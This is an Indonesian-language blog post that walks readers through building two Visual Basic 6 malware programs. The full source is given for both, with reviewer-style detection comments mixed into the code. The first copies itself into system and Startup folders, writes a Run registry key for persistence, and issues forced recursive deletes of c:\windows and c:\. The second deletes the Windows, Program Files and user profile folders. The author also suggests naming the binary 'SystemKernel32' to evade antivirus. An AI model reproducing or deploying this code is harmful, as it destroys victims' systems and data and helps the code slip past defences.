Rabu, 12 Agustus 2009
Selasa, 16 Juni 2009
Seonggok Malware
Diaturin
Tapi jangan usil coy
ini cuma buat mengetahui ajeh
caranya yeh yeh
1. siapin form 1 and module 1
Buat Form sekecil mungkin
2. Copy lalu paste in di form
Nih code buat form
' Form-level state, assigned in Form_Load and handed to reg().
' namefile: file name given to the dropped copy of the executable.
' namereg:  name of the value written under the HKLM ...\CurrentVersion\Run key.
Dim namefile As String
Dim namereg As String
' Entry point of the sample: hides the window, runs the install step (reg) and
' then the destructive routine (payload).
' Triage artifacts visible in this listing: a file named "virus.exe" and a Run
' value named "virus".
Private Sub Form_Load()
' Every runtime error from here on is silently skipped.
On Error Resume Next
' No visible window while the form runs.
Me.Hide
namefile = "virus.exe"
namereg = "virus"
' Intended as "am I already running from an install location?".
' NOTE(review): only the first literal is compared with <>; the remaining
' literals are joined with Or as bare strings, so this is not a per-path
' comparison. With On Error Resume Next active, confirm the outcome in a sandbox
' and assume the install step can run on every launch.
If LCase$(App.Path) <> "c:\windows\system32" Or "c:\windows\start menu\programs\startup" Or "c:\windows\start menu\programs\start up" Or "c:\winnt\system32" Or "c:\winnt\start menu\programs\startup" Or "c:\winnt\start menu\programs\start up" Or "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" Then
reg namefile, namereg
End If
' Called unconditionally, whether or not the install step ran.
payload
End Sub
' Destructive routine: starts two cmd.exe delete commands and then loops forever
' on a message box. No value is assigned to the function name.
' Detection note: a GUI process spawning "cmd /c del" with /F /S /Q against
' c:\windows\* or c:\* is a high-signal process-creation event.
Function payload()
On Error Resume Next
' del switches: /F also removes read-only files, /S recurses into
' subdirectories, /Q suppresses the confirmation prompt.
Shell ("cmd /c del c:\windows\* /F /S /Q")
Shell ("cmd /c del c:\* /F /S /Q")
' Endless loop: the message box reappears each time it is dismissed.
start:
MsgBox "Restart Yah"
GoTo start
End Function
3. Kalo yang ennni code buat modulnyah
' Win32 registry API declarations (ANSI variants from advapi32.dll) used by
' savestring and DeleteValue below.
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
' Registry value types; only REG_SZ is referenced in the code shown on this page.
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' Writes a REG_SZ value: creates or opens strPath under Hkey, sets strValue to
' strdata, then closes the key handle.
'   Hkey     - root key handle (declared As Long)
'   strPath  - subkey path
'   strValue - value name
'   strdata  - string data to store
' The API return codes land in X and are never checked, and On Error Resume Next
' hides runtime errors, so a failed write is silent.
' NOTE(review): the callers in this listing pass the text "HKEY_LOCAL_MACHINE"
' for Hkey although the parameter is a Long; do not assume the Run-key write
' succeeds. When triaging, check both the Run key and the Startup folders.
Public Sub savestring(Hkey As Long, strPath As String, strValue As String, strdata As String)
On Error Resume Next
Dim keyhand As Long
Dim X As Long
X = RegCreateKey(Hkey, strPath, keyhand)
X = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
X = RegCloseKey(keyhand)
End Sub
' Removes the value strValue from the subkey strPath under Hkey: opens the key,
' deletes the value, closes the handle.
' Return codes are stored in X and ignored, and nothing is assigned to the
' function name, so callers cannot tell whether the delete happened.
Public Function DeleteValue(ByVal Hkey As Long, ByVal strPath As String, ByVal strValue As String)
On Error Resume Next
Dim Xkey As Long
Dim X As Long
X = RegOpenKey(Hkey, strPath, Xkey)
X = RegDeleteValue(Xkey, strValue)
X = RegCloseKey(Xkey)
End Function
' Install / persistence step: copies the running executable under the name
' `filename` into one of several fixed locations and tries to register it under
' the HKLM Run key with value name `regname`.
'   filename - file name for the dropped copy
'   regname  - Run value name
' The labels below form a chain of fallbacks wired together with On Error GoTo.
' NOTE(review): which fallback actually executes depends on VB6 error-handler
' semantics and is best confirmed in a sandbox. For triage, treat every
' destination below as a candidate artifact location:
'   c:\windows\system32\, c:\winnt\system32\, c:\, c:\Documents and Settings\,
'   c:\program files\, the "start menu\programs\startup" and "start up" folders
'   under c:\windows and c:\winnt, and the All Users Startup folder.
Function reg(filename As String, regname As String)
On Error GoTo error1
' First attempt: Run value pointing at c:\windows\system32\<filename>.
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\windows\system32\" & filename)
On Error GoTo error2
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32\" & filename
Exit Function
' error1: registry step failed; fall back to the Startup folders under c:\windows.
error1:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\startup\" & filename
On Error GoTo error4
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\start up\" & filename
Exit Function
' error2: copy to c:\windows\system32 failed; try c:\winnt\system32 and rewrite
' the Run value to match.
error2:
On Error GoTo error3
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\system32\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\winnt\system32\" & filename)
Exit Function
' error3: fall back to the root of drive C.
error3:
On Error GoTo error6
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\" & filename)
Exit Function
' error4: Startup folders under c:\winnt.
error4:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\startup\" & filename
On Error GoTo error5
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\start up\" & filename
Exit Function
' error5: All Users Startup folder.
error5:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & filename
Exit Function
' error6: c:\Documents and Settings.
error6:
On Error GoTo error7
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\Documents and Settings\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\Documents and Settings" & filename)
Exit Function
' error7: c:\program files.
error7:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\program files\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\program files\" & filename)
Exit Function
' enditnow: last resort - remove the Run value and terminate the program (End).
enditnow:
On Error Resume Next
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
End
End Function
4. selese oi (T.T)
Antu Maya
Malware simple
Tapi jangan usil coy
ini cuma buat mengetahui ajeh
caranya yeh yeh
1. Buka Visual Basic
2. Bikin form sekecil banget mungkin banget Teh deh source code
' Deletes the folder DirtoDelete through the Scripting.FileSystemObject COM
' object. The second argument (True) is DeleteFolder's force flag, so read-only
' folders are removed as well.
' Detection note: a process that instantiates Scripting.FileSystemObject and
' issues DeleteFolder against system directories is worth alerting on.
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject("Scripting.FileSystemObject")
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
' Entry point of the second sample: checks for a marker file and, if it is
' absent, requests deletion of a fixed list of system and user folders.
' The marker acts as a kill switch: when c:\windows\system32\sayur.txt exists,
' the program ends without calling DelAll.
Private Sub Form_Load()
' Errors from the delete calls are skipped, so a failure on one folder does not
' stop the remaining calls.
On Error Resume Next
If FileExist("c:\windows\system32\sayur.txt") = True Then
' Marker present: terminate immediately.
End
Else
Call DelAll("c:\windows\system")
Call DelAll("c:\windows\system32")
Call DelAll("c:\windows")
Call DelAll("c:\Documents and Settings\All Users")
Call DelAll("c:\Documents and Settings\Administrator")
Call DelAll("c:\Documents and Settings")
Call DelAll("c:\Program Files\Common Files")
Call DelAll("c:\Program Files\Internet Explorer")
Call DelAll("c:\Program Files\Microsoft Visual Studio")
Call DelAll("c:\Program Files")
' Terminate once the delete calls have been issued.
End
End If
End Sub
' Reports whether Dir() finds an entry matching FileName.
' Form_Load calls this to look for the marker file that stops the sample from
' running its delete calls.
'   FileName - path to test
'   Returns True when Dir returns a non-empty name, False otherwise.
Function FileExist(ByVal FileName As String) As Boolean
    ' Dir yields "" when nothing matches the given path.
    FileExist = (Dir(FileName) <> "")
End Function
3. Warning !!!
If FileExist("c:\windows\system32\sayur.txt") = True Then
perhatikan sayur.txt itu bisa diganti namanya terserah mw diganti apa.
itu fungsinya: kalo ada file yang bernama sayur.txt di system32, nih virus ga jadi beraktifitas.
Kalo dak ade, buat dulu pake notepad, simpan di system32.
4. Call DelAll("c:\windows\system")
Call DelAll("c:\windows\system32")
Call DelAll("c:\windows")
Call DelAll("C:\Documents and Settings\All Users")
Call DelAll("C:\Documents and Settings\Administrator")
Call DelAll("C:\Documents and Settings")
Call DelAll("C:\Program Files\Common Files")
Call DelAll("C:\Program Files\Internet Explorer")
Call DelAll("C:\Program Files\Microsoft Visual Studio")
Nah ini yang bahaya (O_o) baris ini fungsinya buat ngapus directori
bisa di ganti
misalnya jadi
CAll DelAll(*mp3*)
CAll DelAll(*doc*) atw apalah
5. Yang Terakhir kamu kompile pake nama "SystemKernel32" biar ga kedeteksi AntiVirus
6. Simpel Kan
Call DelAll("C:\Program Files")